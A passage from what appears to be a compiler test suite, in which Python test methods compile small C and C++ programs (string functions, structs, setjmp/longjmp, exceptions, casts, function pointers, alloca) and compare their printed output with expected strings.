if self.emcc_args == []:
gen = open(self.in_dir('src.cpp.o.js')).read()
assert ('var __str1;' in gen) == named
def test_strcmp_uni(self):
src = '''
#include <stdio.h>
#include <string.h>
int main()
{
#define TEST(func) \
{ \
char *word = "WORD"; \
char wordEntry[2] = { -61,-126 }; /* "Â"; */ \
int cmp = func(word, wordEntry, 2); \
printf("Compare value " #func " is %d\\n", cmp); \
}
TEST(strncmp);
TEST(strncasecmp);
TEST(memcmp);
}
'''
self.do_run(src, 'Compare value strncmp is -1\nCompare value strncasecmp is -1\nCompare value memcmp is -1\n')
def test_strndup(self):
src = '''
//---------------
//- http://pubs.opengroup.org/onlinepubs/9699919799/functions/strndup.html
//---------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
const char* source = "strndup - duplicate a specific number of bytes from a string";
char* strdup_val = strndup(source, 0);
printf("1:%s\\n", strdup_val);
free(strdup_val);
strdup_val = strndup(source, 7);
printf("2:%s\\n", strdup_val);
free(strdup_val);
strdup_val = strndup(source, 1000);
printf("3:%s\\n", strdup_val);
free(strdup_val);
strdup_val = strndup(source, 60);
printf("4:%s\\n", strdup_val);
free(strdup_val);
strdup_val = strndup(source, 19);
printf("5:%s\\n", strdup_val);
free(strdup_val);
strdup_val = strndup(source, -1);
printf("6:%s\\n", strdup_val);
free(strdup_val);
return 0;
}
'''
self.do_run(src, '1:\n2:strndup\n3:strndup - duplicate a specific number of bytes from a string\n4:strndup - duplicate a specific number of bytes from a string\n5:strndup - duplicate\n6:\n')
def test_errar(self):
src = r'''
#include <stdio.h>
#include <errno.h>
#include <string.h>
int main() {
char* err;
char buffer[200];
err = strerror(EDOM);
strerror_r(EWOULDBLOCK, buffer, 200);
printf("<%s>\n", err);
printf("<%s>\n", buffer);
printf("<%d>\n", strerror_r(EWOULDBLOCK, buffer, 0));
errno = 123;
printf("<%d>\n", errno);
return 0;
}
'''
expected = '''
<Math arg out of domain of func>
<No more processes>
<34>
<123>
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_mainenv(self):
src = '''
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
printf("*%p*\\n", envp);
return 0;
}
'''
self.do_run(src, '*(nil)*')
def test_funcs(self):
src = '''
#include <stdio.h>
int funcy(int x)
{
return x*9;
}
int main()
{
printf("*%d,%d*\\n", funcy(8), funcy(10));
return 0;
}
'''
self.do_run(src, '*72,90*')
def test_structs(self):
src = '''
#include <stdio.h>
struct S
{
int x, y;
};
int main()
{
S a, b;
a.x = 5; a.y = 6;
b.x = 101; b.y = 7009;
S *c, *d;
c = &a;
c->x *= 2;
c = &b;
c->y -= 1;
d = c;
d->y += 10;
printf("*%d,%d,%d,%d,%d,%d,%d,%d*\\n", a.x, a.y, b.x, b.y, c->x, c->y, d->x, d->y);
return 0;
}
'''
self.do_run(src, '*10,6,101,7018,101,7018,101,7018*')
gen_struct_src = '''
#include <stdio.h>
#include <stdlib.h>
#include "emscripten.h"
struct S
{
int x, y;
};
int main()
{
S* a = {{gen_struct}};
a->x = 51; a->y = 62;
printf("*%d,%d*\\n", a->x, a->y);
{{del_struct}}(a);
return 0;
}
'''
def test_mallocstruct(self):
self.do_run(self.gen_struct_src.replace('{{gen_struct}}', '(S*)malloc(sizeof(S))').replace('{{del_struct}}', 'free'), '*51,62*')
def test_newstruct(self):
if self.emcc_args is None: return self.skip('requires emcc')
self.do_run(self.gen_struct_src.replace('{{gen_struct}}', 'new S').replace('{{del_struct}}', 'delete'), '*51,62*')
def test_addr_of_stacked(self):
src = '''
#include <stdio.h>
void alter(int *y)
{
*y += 5;
}
int main()
{
int x = 2;
alter(&x);
printf("*%d*\\n", x);
return 0;
}
'''
self.do_run(src, '*7*')
def test_globals(self):
src = '''
#include <stdio.h>
char cache[256], *next = cache;
int main()
{
cache[10] = 25;
next[20] = 51;
printf("*%d,%d*\\n", next[10], cache[20]);
return 0;
}
'''
self.do_run(src, '*25,51*')
def test_linked_list(self):
src = '''
#include <stdio.h>
struct worker_args {
int value;
struct worker_args *next;
};
int main()
{
worker_args a;
worker_args b;
a.value = 60;
a.next = &b;
b.value = 900;
b.next = NULL;
worker_args* c = &a;
int total = 0;
while (c) {
total += c->value;
c = c->next;
}
// Chunk of em
worker_args chunk[10];
for (int i = 0; i < 9; i++) {
chunk[i].value = i*10;
chunk[i].next = &chunk[i+1];
}
chunk[9].value = 90;
chunk[9].next = &chunk[0];
c = chunk;
do {
total += c->value;
c = c->next;
} while (c != chunk);
printf("*%d,%d*\\n", total, b.next);
// NULL *is* 0, in C/C++. No JS null! (null == 0 is false, etc.)
return 0;
}
'''
self.do_run(src, '*1410,0*')
def test_sup(self):
src = '''
#include <stdio.h>
struct S4 { int x; }; // size: 4
struct S4_2 { short x, y; }; // size: 4, but for alignment purposes, 2
struct S6 { short x, y, z; }; // size: 6
struct S6w { char x[6]; }; // size: 6 also
struct S6z { int x; short y; }; // size: 8, since we align to a multiple of the biggest - 4
struct C___ { S6 a, b, c; int later; };
struct Carr { S6 a[3]; int later; }; // essentially the same, but differently defined
struct C__w { S6 a; S6w b; S6 c; int later; }; // same size, different struct
struct Cp1_ { int pre; short a; S6 b, c; int later; }; // fillers for a
struct Cp2_ { int a; short pre; S6 b, c; int later; }; // fillers for a (get addr of the other filler)
struct Cint { S6 a; int b; S6 c; int later; }; // An int (different size) for b
struct C4__ { S6 a; S4 b; S6 c; int later; }; // Same size as int from before, but a struct
struct C4_2 { S6 a; S4_2 b; S6 c; int later; }; // Same size as int from before, but a struct with max element size 2
struct C__z { S6 a; S6z b; S6 c; int later; }; // different size, 8 instead of 6
int main()
{
#define TEST(struc) \\
{ \\
struc *s = 0; \\
printf("*%s: %d,%d,%d,%d<%d*\\n", #struc, (int)&(s->a), (int)&(s->b), (int)&(s->c), (int)&(s->later), sizeof(struc)); \\
}
#define TEST_ARR(struc) \\
{ \\
struc *s = 0; \\
printf("*%s: %d,%d,%d,%d<%d*\\n", #struc, (int)&(s->a[0]), (int)&(s->a[1]), (int)&(s->a[2]), (int)&(s->later), sizeof(struc)); \\
}
printf("sizeofs:%d,%d\\n", sizeof(S6), sizeof(S6z));
TEST(C___);
TEST_ARR(Carr);
TEST(C__w);
TEST(Cp1_);
TEST(Cp2_);
TEST(Cint);
TEST(C4__);
TEST(C4_2);
TEST(C__z);
return 0;
}
'''
if Settings.QUANTUM_SIZE == 1:
self.do_run(src, 'sizeofs:6,8\n*C___: 0,3,6,9<24*\n*Carr: 0,3,6,9<24*\n*C__w: 0,3,9,12<24*\n*Cp1_: 1,2,5,8<24*\n*Cp2_: 0,2,5,8<24*\n*Cint: 0,3,4,7<24*\n*C4__: 0,3,4,7<24*\n*C4_2: 0,3,5,8<20*\n*C__z: 0,3,5,8<28*')
else:
self.do_run(src, 'sizeofs:6,8\n*C___: 0,6,12,20<24*\n*Carr: 0,6,12,20<24*\n*C__w: 0,6,12,20<24*\n*Cp1_: 4,6,12,20<24*\n*Cp2_: 0,6,12,20<24*\n*Cint: 0,8,12,20<24*\n*C4__: 0,8,12,20<24*\n*C4_2: 0,6,10,16<20*\n*C__z: 0,8,16,24<28*')
def test_assert(self):
src = '''
#include <stdio.h>
#include <assert.h>
int main() {
assert(1 == true); // pass
assert(1 == false); // fail
return 0;
}
'''
self.do_run(src, 'Assertion failed: 1 == false')
def test_libcextra(self):
if self.emcc_args is None: return self.skip('needs emcc for libcextra')
src = r'''
#include <stdio.h>
#include <wchar.h>
int main()
{
const wchar_t* wstr = L"Hello";
printf("wcslen: %d\n", wcslen(wstr));
return 0;
}
'''
self.do_run(src, 'wcslen: 5')
def test_longjmp(self):
src = r'''
#include <stdio.h>
#include <setjmp.h>
static jmp_buf buf;
void second(void) {
printf("second\n");
longjmp(buf,-1);
}
void first(void) {
printf("first\n"); // prints
longjmp(buf,1); // jumps back to where setjmp was called - making setjmp now return 1
}
int main() {
volatile int x = 0;
int jmpval = setjmp(buf);
if (!jmpval) {
x++; // should be properly restored once longjmp jumps back
first(); // when executed, setjmp returns 1
printf("skipped\n"); // does not print
} else if (jmpval == 1) { // when first() jumps back, setjmp returns 1
printf("result: %d %d\n", x, jmpval); // prints
x++;
second(); // when executed, setjmp returns -1
} else if (jmpval == -1) { // when second() jumps back, setjmp returns -1
printf("result: %d %d\n", x, jmpval); // prints
}
return 0;
}
'''
self.do_run(src, 'first\nresult: 1 1\nsecond\nresult: 2 -1')
def test_longjmp2(self):
src = r'''
#include <setjmp.h>
#include <stdio.h>
typedef struct {
jmp_buf* jmp;
} jmp_state;
void stack_manipulate_func(jmp_state* s, int level) {
jmp_buf buf;
printf("Entering stack_manipulate_func, level: %d\n", level);
if (level == 0) {
s->jmp = &buf;
if (setjmp(*(s->jmp)) == 0) {
printf("Setjmp normal execution path, level: %d\n", level);
stack_manipulate_func(s, level + 1);
} else {
printf("Setjmp error execution path, level: %d\n", level);
}
} else {
printf("Perform longjmp at level %d\n", level);
longjmp(*(s->jmp), 1);
}
printf("Exiting stack_manipulate_func, level: %d\n", level);
}
int main(int argc, char *argv[]) {
jmp_state s;
s.jmp = NULL;
stack_manipulate_func(&s, 0);
return 0;
}
'''
self.do_run(src, '''Entering stack_manipulate_func, level: 0
Setjmp normal execution path, level: 0
Entering stack_manipulate_func, level: 1
Perform longjmp at level 1
Setjmp error execution path, level: 0
Exiting stack_manipulate_func, level: 0
''')
def test_longjmp3(self):
src = r'''
#include <setjmp.h>
#include <stdio.h>
typedef struct {
jmp_buf* jmp;
} jmp_state;
void setjmp_func(jmp_state* s, int level) {
jmp_buf* prev_jmp = s->jmp;
jmp_buf c_jmp;
if (level == 2) {
printf("level is 2, perform longjmp!\n");
longjmp(*(s->jmp), 1);
}
if (setjmp(c_jmp) == 0) {
printf("setjmp normal execution path, level: %d\n", level);
s->jmp = &c_jmp;
setjmp_func(s, level + 1);
} else {
printf("setjmp exception execution path, level: %d\n", level);
if (prev_jmp) {
printf("prev_jmp is not empty, continue with longjmp!\n");
s->jmp = prev_jmp;
longjmp(*(s->jmp), 1);
}
}
printf("Exiting setjmp function, level: %d\n", level);
}
int main(int argc, char *argv[]) {
jmp_state s;
s.jmp = NULL;
setjmp_func(&s, 0);
return 0;
}
'''
self.do_run(src, '''setjmp normal execution path, level: 0
setjmp normal execution path, level: 1
level is 2, perform longjmp!
setjmp exception execution path, level: 1
prev_jmp is not empty, continue with longjmp!
setjmp exception execution path, level: 0
Exiting setjmp function, level: 0
''')
def test_longjmp4(self):
src = r'''
#include <setjmp.h>
#include <stdio.h>
typedef struct {
jmp_buf* jmp;
} jmp_state;
void second_func(jmp_state* s);
void first_func(jmp_state* s) {
jmp_buf* prev_jmp = s->jmp;
jmp_buf c_jmp;
volatile int once = 0;
if (setjmp(c_jmp) == 0) {
printf("Normal execution path of first function!\n");
s->jmp = &c_jmp;
second_func(s);
} else {
printf("Exception execution path of first function! %d\n", once);
if (!once) {
printf("Calling longjmp the second time!\n");
once = 1;
longjmp(*(s->jmp), 1);
}
}
}
void second_func(jmp_state* s) {
longjmp(*(s->jmp), 1);
}
int main(int argc, char *argv[]) {
jmp_state s;
s.jmp = NULL;
first_func(&s);
return 0;
}
'''
self.do_run(src, '''Normal execution path of first function!
Exception execution path of first function! 0
Calling longjmp the second time!
Exception execution path of first function! 1
''')
def test_longjmp_funcptr(self):
src = r'''
#include <stdio.h>
#include <setjmp.h>
static jmp_buf buf;
void (*fp)() = NULL;
void second(void) {
printf("second\n"); // prints
longjmp(buf,1); // jumps back to where setjmp was called - making setjmp now return 1
}
void first(void) {
fp();
printf("first\n"); // does not print
}
int main(int argc, char **argv) {
fp = argc == 200 ? NULL : second;
volatile int x = 0;
if ( ! setjmp(buf) ) {
x++;
first(); // when executed, setjmp returns 0
} else { // when longjmp jumps back, setjmp returns 1
printf("main: %d\n", x); // prints
}
return 0;
}
'''
self.do_run(src, 'second\nmain: 1\n')
def test_longjmp_repeat(self):
Settings.MAX_SETJMPS = 1
src = r'''
#include <stdio.h>
#include <setjmp.h>
static jmp_buf buf;
int main() {
volatile int x = 0;
printf("setjmp:%d\n", setjmp(buf));
x++;
printf("x:%d\n", x);
if (x < 4) longjmp(buf, x*2);
return 0;
}
'''
self.do_run(src, '''setjmp:0
x:1
setjmp:2
x:2
setjmp:4
x:3
setjmp:6
x:4
''')
def test_longjmp_stacked(self):
src = r'''
#include <stdio.h>
#include <setjmp.h>
#include <stdlib.h>
#include <string.h>
int bottom, top;
int run(int y) {
// confuse stack
char *s = (char*)alloca(100);
memset(s, 1, 100);
s[y] = y;
s[y/2] = y*2;
volatile int x = s[y];
top = (int)alloca(4);
if (x <= 2) return x;
jmp_buf buf;
printf("setjmp of %d\n", x);
if (setjmp(buf) == 0) {
printf("going\n");
x += run(x/2);
longjmp(buf, 1);
}
printf("back\n");
return x/2;
}
int main(int argc, char **argv) {
int sum = 0;
for (int i = 0; i < argc*2; i++) {
bottom = (int)alloca(4);
sum += run(10);
// scorch the earth
if (bottom < top) {
memset((void*)bottom, 1, top - bottom);
} else {
memset((void*)top, 1, bottom - top);
}
}
printf("%d\n", sum);
return sum;
}
'''
self.do_run(src, '''setjmp of 10
going
setjmp of 5
going
back
back
setjmp of 10
going
setjmp of 5
going
back
back
12
''')
def test_longjmp_exc(self):
src = r'''
#include <stdlib.h>
#include <stdio.h>
#include <setjmp.h>
#include <emscripten.h>
jmp_buf abortframe;
void dostuff(int a) {
printf("pre\n");
if (a != 42) emscripten_run_script("waka_waka()"); // this should fail, and never reach "never"
printf("never\n");
if (a == 100) {
longjmp (abortframe, -1);
}
if (setjmp(abortframe)) {
printf("got 100");
}
}
int main(int argc, char **argv) {
dostuff(argc);
exit(1);
return 1;
}
'''
self.do_run(src, 'waka_waka');
def test_setjmp_many(self):
src = r'''
#include <stdio.h>
#include <setjmp.h>
int main(int argc) {
jmp_buf buf;
for (int i = 0; i < NUM; i++) printf("%d\n", setjmp(buf));
if (argc-- == 1131) longjmp(buf, 11);
return 0;
}
'''
for num in [Settings.MAX_SETJMPS, Settings.MAX_SETJMPS+1]:
print num
self.do_run(src.replace('NUM', str(num)), '0\n' * num if num <= Settings.MAX_SETJMPS or not Settings.ASM_JS else 'build with a higher value for MAX_SETJMPS')
def test_exceptions(self):
if Settings.QUANTUM_SIZE == 1: return self.skip("we don't support libcxx in q1")
if self.emcc_args is None: return self.skip('need emcc to add in libcxx properly')
Settings.EXCEPTION_DEBUG = 1
Settings.DISABLE_EXCEPTION_CATCHING = 0
if '-O2' in self.emcc_args:
self.emcc_args += ['--closure', '1'] # Use closure here for some additional coverage
src = '''
#include <stdio.h>
void thrower() {
printf("infunc...");
throw(99);
printf("FAIL");
}
int main() {
try {
printf("*throw...");
throw(1);
printf("FAIL");
} catch(...) {
printf("caught!");
}
try {
thrower();
} catch(...) {
printf("done!*\\n");
}
return 0;
}
'''
self.do_run(src, '*throw...caught!infunc...done!*')
Settings.DISABLE_EXCEPTION_CATCHING = 1
self.do_run(src, 'Exception catching is disabled, this exception cannot be caught. Compile with -s DISABLE_EXCEPTION_CATCHING=0')
src = '''
#include <iostream>
class MyException
{
public:
MyException(){ std::cout << "Construct..."; }
MyException( const MyException & ) { std::cout << "Copy..."; }
~MyException(){ std::cout << "Destruct..."; }
};
int function()
{
std::cout << "Throw...";
throw MyException();
}
int function2()
{
return function();
}
int main()
{
try
{
function2();
}
catch (MyException & e)
{
std::cout << "Catched...";
}
try
{
function2();
}
catch (MyException e)
{
std::cout << "Catched...";
}
return 0;
}
'''
Settings.DISABLE_EXCEPTION_CATCHING = 0
if '-O2' in self.emcc_args:
self.emcc_args.pop() ; self.emcc_args.pop() # disable closure to work around a closure bug
self.do_run(src, 'Throw...Construct...Catched...Destruct...Throw...Construct...Copy...Catched...Destruct...Destruct...')
def test_white_list_exception(self):
Settings.DISABLE_EXCEPTION_CATCHING = 2
Settings.EXCEPTION_CATCHING_WHITELIST = ["__Z12somefunctionv"]
Settings.INLINING_LIMIT = 50 # otherwise it is inlined and not identified
src = '''
#include <stdio.h>
void thrower() {
printf("infunc...");
throw(99);
printf("FAIL");
}
void somefunction() {
try {
thrower();
} catch(...) {
printf("done!*\\n");
}
}
int main() {
somefunction();
return 0;
}
'''
self.do_run(src, 'infunc...done!*')
Settings.DISABLE_EXCEPTION_CATCHING = 0
Settings.EXCEPTION_CATCHING_WHITELIST = []
def test_uncaught_exception(self):
if self.emcc_args is None: return self.skip('no libcxx inclusion without emcc')
Settings.DISABLE_EXCEPTION_CATCHING = 0
src = r'''
#include <stdio.h>
#include <exception>
struct X {
~X() {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
}
};
int main() {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
try {
X x;
throw 1;
} catch(...) {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
}
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
return 0;
}
'''
self.do_run(src, 'exception? no\nexception? yes\nexception? no\nexception? no\n')
src = r'''
#include <fstream>
#include <iostream>
int main() {
std::ofstream os("test");
os << std::unitbuf << "foo"; // trigger a call to std::uncaught_exception from
// std::basic_ostream::sentry::~sentry
std::cout << "success";
}
'''
self.do_run(src, 'success')
def test_typed_exceptions(self):
Settings.DISABLE_EXCEPTION_CATCHING = 0
Settings.SAFE_HEAP = 0 # Throwing null will cause an ignorable null pointer access.
src = open(path_from_root('tests', 'exceptions', 'typed.cpp'), 'r').read()
expected = open(path_from_root('tests', 'exceptions', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_multiexception(self):
Settings.DISABLE_EXCEPTION_CATCHING = 0
src = r'''
#include <stdio.h>
static int current_exception_id = 0;
typedef struct {
int jmp;
} jmp_state;
void setjmp_func(jmp_state* s, int level) {
int prev_jmp = s->jmp;
int c_jmp;
if (level == 2) {
printf("level is 2, perform longjmp!\n");
throw 1;
}
c_jmp = current_exception_id++;
try {
printf("setjmp normal execution path, level: %d, prev_jmp: %d\n", level, prev_jmp);
s->jmp = c_jmp;
setjmp_func(s, level + 1);
} catch (int catched_eid) {
printf("caught %d\n", catched_eid);
if (catched_eid == c_jmp) {
printf("setjmp exception execution path, level: %d, prev_jmp: %d\n", level, prev_jmp);
if (prev_jmp != -1) {
printf("prev_jmp is not empty, continue with longjmp!\n");
s->jmp = prev_jmp;
throw s->jmp;
}
} else {
throw;
}
}
printf("Exiting setjmp function, level: %d, prev_jmp: %d\n", level, prev_jmp);
}
int main(int argc, char *argv[]) {
jmp_state s;
s.jmp = -1;
setjmp_func(&s, 0);
return 0;
}
'''
self.do_run(src, '''setjmp normal execution path, level: 0, prev_jmp: -1
setjmp normal execution path, level: 1, prev_jmp: 0
level is 2, perform longjmp!
caught 1
setjmp exception execution path, level: 1, prev_jmp: 0
prev_jmp is not empty, continue with longjmp!
caught 0
setjmp exception execution path, level: 0, prev_jmp: -1
Exiting setjmp function, level: 0, prev_jmp: -1
''')
def test_std_exception(self):
if self.emcc_args is None: return self.skip('requires emcc')
Settings.DISABLE_EXCEPTION_CATCHING = 0
self.emcc_args += ['-s', 'SAFE_HEAP=0']
src = r'''
#include <stdio.h>
#include <exception>
int main()
{
std::exception e;
try {
throw e;
} catch(std::exception e) {
printf("caught std::exception\n");
}
return 0;
}
'''
self.do_run(src, 'caught std::exception')
def test_exit_stack(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.ASM_JS: return self.skip('uses report_stack without exporting')
Settings.INLINING_LIMIT = 50
src = r'''
#include <stdio.h>
#include <stdlib.h>
extern "C" {
extern void report_stack(int x);
}
char moar() {
char temp[125];
for (int i = 0; i < 125; i++) temp[i] = i*i;
for (int i = 1; i < 125; i++) temp[i] += temp[i-1]/2;
if (temp[100] != 99) exit(1);
return temp[120];
}
int main(int argc, char *argv[]) {
report_stack((int)alloca(4));
printf("*%d*\n", moar());
return 0;
}
'''
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var initialStack = -1;
var _report_stack = function(x) {
Module.print('reported');
initialStack = x;
}
var Module = {
postRun: function() {
Module.print('postRun');
assert(initialStack == STACKTOP, [initialStack, STACKTOP]);
Module.print('ok.');
}
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
self.do_run(src, '''reported\nExit Status: 1\npostRun\nok.\n''')
def test_class(self):
src = '''
#include <stdio.h>
struct Random {
enum { IM = 139968, IA = 3877, IC = 29573 };
Random() : last(42) {}
float get( float max = 1.0f ) {
last = ( last * IA + IC ) % IM;
return max * last / IM;
}
protected:
unsigned int last;
} rng1;
int main()
{
Random rng2;
int count = 0;
for (int i = 0; i < 100; i++) {
float x1 = rng1.get();
float x2 = rng2.get();
printf("%f, %f\\n", x1, x2);
if (x1 != x2) count += 1;
}
printf("*%d*\\n", count);
return 0;
}
'''
self.do_run(src, '*0*')
def test_inherit(self):
src = '''
#include <stdio.h>
struct Parent {
int x1, x2;
};
struct Child : Parent {
int y;
};
int main()
{
Parent a;
a.x1 = 50;
a.x2 = 87;
Child b;
b.x1 = 78;
b.x2 = 550;
b.y = 101;
Child* c = (Child*)&a;
c->x1 ++;
c = &b;
c->y --;
printf("*%d,%d,%d,%d,%d,%d,%d*\\n", a.x1, a.x2, b.x1, b.x2, b.y, c->x1, c->x2);
return 0;
}
'''
self.do_run(src, '*51,87,78,550,100,78,550*')
def test_isdigit_l(self):
if self.emcc_args is None: return self.skip('no libcxx inclusion without emcc')
src = '''
#include <iostream>
int main() {
using namespace std;
use_facet<num_put<char> >(cout.getloc()).put(cout, cout, '0', 3.14159265);
}
'''
self.do_run(src, '3.14159')
def test_polymorph(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <stdio.h>
struct Pure {
virtual int implme() = 0;
};
struct Parent : Pure {
virtual int getit() { return 11; };
int implme() { return 32; }
};
struct Child : Parent {
int getit() { return 74; }
int implme() { return 1012; }
};
struct Other {
int one() { return 11; }
int two() { return 22; }
};
int main()
{
Parent *x = new Parent();
Parent *y = new Child();
printf("*%d,%d,%d,%d*\\n", x->getit(), y->getit(), x->implme(), y->implme());
Other *o = new Other;
int (Other::*Ls)() = &Other::one;
printf("*%d*\\n", (o->*(Ls))());
Ls = &Other::two;
printf("*%d*\\n", (o->*(Ls))());
return 0;
}
'''
self.do_run(src, '*11,74,32,1012*\n*11*\n*22*')
def test_segfault(self):
if self.emcc_args is None: return self.skip('SAFE_HEAP without ta2 means we check types too, which hide segfaults')
if Settings.ASM_JS: return self.skip('asm does not support safe heap')
Settings.SAFE_HEAP = 1
for addr in ['0', 'new D2()']:
print addr
src = r'''
#include <stdio.h>
struct Classey {
virtual void doIt() = 0;
};
struct D1 : Classey {
virtual void doIt() { printf("fleefl\n"); }
};
struct D2 : Classey {
virtual void doIt() { printf("marfoosh\n"); }
};
int main(int argc, char **argv)
{
Classey *p = argc == 100 ? new D1() : (Classey*)%s;
p->doIt();
return 0;
}
''' % addr
self.do_run(src, 'segmentation fault' if addr.isdigit() else 'marfoosh')
def test_safe_dyncalls(self):
if Settings.ASM_JS: return self.skip('asm does not support missing function stack traces')
if Settings.SAFE_HEAP: return self.skip('safe heap warning will appear instead')
if self.emcc_args is None: return self.skip('need libc')
Settings.SAFE_DYNCALLS = 1
for cond, body, work in [(True, True, False), (True, False, False), (False, True, True), (False, False, False)]:
print cond, body, work
src = r'''
#include <stdio.h>
struct Classey {
virtual void doIt() = 0;
};
struct D1 : Classey {
virtual void doIt() BODY;
};
int main(int argc, char **argv)
{
Classey *p = argc COND 100 ? new D1() : NULL;
printf("%p\n", p);
p->doIt();
return 0;
}
'''.replace('COND', '==' if cond else '!=').replace('BODY', r'{ printf("all good\n"); }' if body else '')
self.do_run(src, 'dyncall error: vi' if not work else 'all good')
def test_dynamic_cast(self):
if self.emcc_args is None: return self.skip('need libcxxabi')
src = r'''
#include <stdio.h>
struct Support {
virtual void f() {
printf("f()\n");
}
};
struct Derived : Support {
};
int main() {
Support * p = new Derived;
dynamic_cast<Derived*>(p)->f();
}
'''
self.do_run(src, 'f()\n')
def test_dynamic_cast_b(self):
if self.emcc_args is None: return self.skip('need libcxxabi')
src = '''
#include <stdio.h>
class CBase { virtual void dummy() {} };
class CDerived : public CBase { int a; };
class CDerivedest : public CDerived { float b; };
int main ()
{
CBase *pa = new CBase;
CBase *pb = new CDerived;
CBase *pc = new CDerivedest;
printf("a1: %d\\n", dynamic_cast<CDerivedest*>(pa) != NULL);
printf("a2: %d\\n", dynamic_cast<CDerived*>(pa) != NULL);
printf("a3: %d\\n", dynamic_cast<CBase*>(pa) != NULL);
printf("b1: %d\\n", dynamic_cast<CDerivedest*>(pb) != NULL);
printf("b2: %d\\n", dynamic_cast<CDerived*>(pb) != NULL);
printf("b3: %d\\n", dynamic_cast<CBase*>(pb) != NULL);
printf("c1: %d\\n", dynamic_cast<CDerivedest*>(pc) != NULL);
printf("c2: %d\\n", dynamic_cast<CDerived*>(pc) != NULL);
printf("c3: %d\\n", dynamic_cast<CBase*>(pc) != NULL);
return 0;
}
'''
self.do_run(src, 'a1: 0\na2: 0\na3: 1\nb1: 0\nb2: 1\nb3: 1\nc1: 1\nc2: 1\nc3: 1\n')
def test_dynamic_cast_2(self):
if self.emcc_args is None: return self.skip('need libcxxabi')
src = r'''
#include <stdio.h>
#include <typeinfo>
class Class {};
int main() {
const Class* dp = dynamic_cast<const Class*>(&typeid(Class));
// should return dp == NULL,
printf("pointer: %p\n", dp);
}
'''
self.do_run(src, "pointer: (nil)")
def test_funcptr(self):
src = '''
#include <stdio.h>
int calc1() { return 26; }
int calc2() { return 90; }
typedef int (*fp_t)();
fp_t globally1 = calc1;
fp_t globally2 = calc2;
int nothing(const char *str) { return 0; }
int main()
{
fp_t fp = calc1;
void *vp = (void*)fp;
fp_t fpb = (fp_t)vp;
fp_t fp2 = calc2;
void *vp2 = (void*)fp2;
fp_t fpb2 = (fp_t)vp2;
printf("*%d,%d,%d,%d,%d,%d*\\n", fp(), fpb(), fp2(), fpb2(), globally1(), globally2());
fp_t t = calc1;
printf("*%d,%d", t == calc1, t == calc2);
t = calc2;
printf(",%d,%d*\\n", t == calc1, t == calc2);
int (*other)(const char *str);
other = nothing;
other("*hello!*");
other = puts;
other("*goodbye!*");
return 0;
}
'''
self.do_run(src, '*26,26,90,90,26,90*\n*1,0,0,1*\n*goodbye!*')
def test_mathfuncptr(self):
src = '''
#include <math.h>
#include <stdio.h>
int
main(int argc, char **argv) {
float (*fn)(float) = argc != 12 ? &sqrtf : &fabsf;
float (*fn2)(float) = argc != 13 ? &fabsf : &sqrtf;
float (*fn3)(float) = argc != 14 ? &erff : &fabsf;
printf("fn2(-5) = %d, fn(10) = %.2f, erf(10) = %.2f\\n", (int)fn2(-5), fn(10), fn3(10));
return 0;
}
'''
self.do_run(src, 'fn2(-5) = 5, fn(10) = 3.16, erf(10) = 1.00')
def test_funcptrfunc(self):
src = r'''
#include <stdio.h>
typedef void (*funcptr)(int, int);
typedef funcptr (*funcptrfunc)(int);
funcptr __attribute__ ((noinline)) getIt(int x) {
return (funcptr)x;
}
int main(int argc, char **argv)
{
funcptrfunc fpf = argc < 100 ? getIt : NULL;
printf("*%p*\n", fpf(argc));
return 0;
}
'''
self.do_run(src, '*0x1*')
def test_funcptr_namecollide(self):
src = r'''
#include <stdio.h>
void do_call(void (*puts)(const char *), const char *str);
void do_print(const char *str) {
if (!str) do_call(NULL, "delusion");
if ((int)str == -1) do_print(str+10);
puts("====");
puts(str);
puts("====");
}
void do_call(void (*puts)(const char *), const char *str) {
if (!str) do_print("confusion");
if ((int)str == -1) do_call(NULL, str-10);
(*puts)(str);
}
int main(int argc, char **argv)
{
for (int i = 0; i < argc; i++) {
do_call(i != 10 ? do_print : NULL, i != 15 ? "waka waka" : NULL);
}
return 0;
}
'''
self.do_run(src, 'waka', force_c=True)
def test_emptyclass(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <stdio.h>
struct Randomized {
Randomized(int x) {
printf("*zzcheezzz*\\n");
}
};
int main( int argc, const char *argv[] ) {
new Randomized(55);
return 0;
}
'''
self.do_run(src, '*zzcheezzz*')
def test_alloca(self):
src = '''
#include <stdio.h>
#include <stdlib.h>
int main() {
char *pc;
pc = (char *)alloca(5);
printf("z:%d*%d*\\n", pc > 0, (int)pc);
return 0;
}
'''
self.do_run(src, 'z:1*', force_c=True)
def test_rename(self):
src = '''
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <assert.h>
int main() {
int err;
FILE* fid;
err = mkdir("/foo", 0777);
err = mkdir("/bar", 0777);
fid = fopen("/foo/bar", "w+");
fclose(fid);
err = rename("/foo/bar", "/foo/bar2");
printf("%d\\n", err);
err = rename("/foo", "/foo/foo");
printf("%d\\n", err);
err = rename("/foo", "/bar/foo");
printf("%d\\n", err);
return 0;
}
'''
self.do_run(src, '0\n-1\n0\n', force_c=True)
def test_alloca_stack(self):
if self.emcc_args is None: return # too slow in other modes
# We should not blow up the stack with numerous allocas
src = '''
#include <stdio.h>
#include <stdlib.h>
func(int i) {
char *pc = (char *)alloca(100);
*pc = i;
(*pc)++;
return (*pc) % 10;
}
int main() {
int total = 0;
for (int i = 0; i < 1024*1024; i++)
total += func(i);
printf("ok:%d*\\n", total);
return 0;
}
'''
self.do_run(src, 'ok:-32768*', force_c=True)
def test_stack_byval(self):
if self.emcc_args is None: return # too slow in other modes
# We should also not blow up the stack with byval arguments
src = r'''
#include<stdio.h>
struct vec {
int x, y, z;
vec(int x_, int y_, int z_) : x(x_), y(y_), z(z_) {}
static vec add(vec a, vec b) {
return vec(a.x+b.x, a.y+b.y, a.z+b.z);
}
};
int main() {
int total = 0;
for (int i = 0; i < 1000; i++) {
for (int j = 0; j < 1000; j++) {
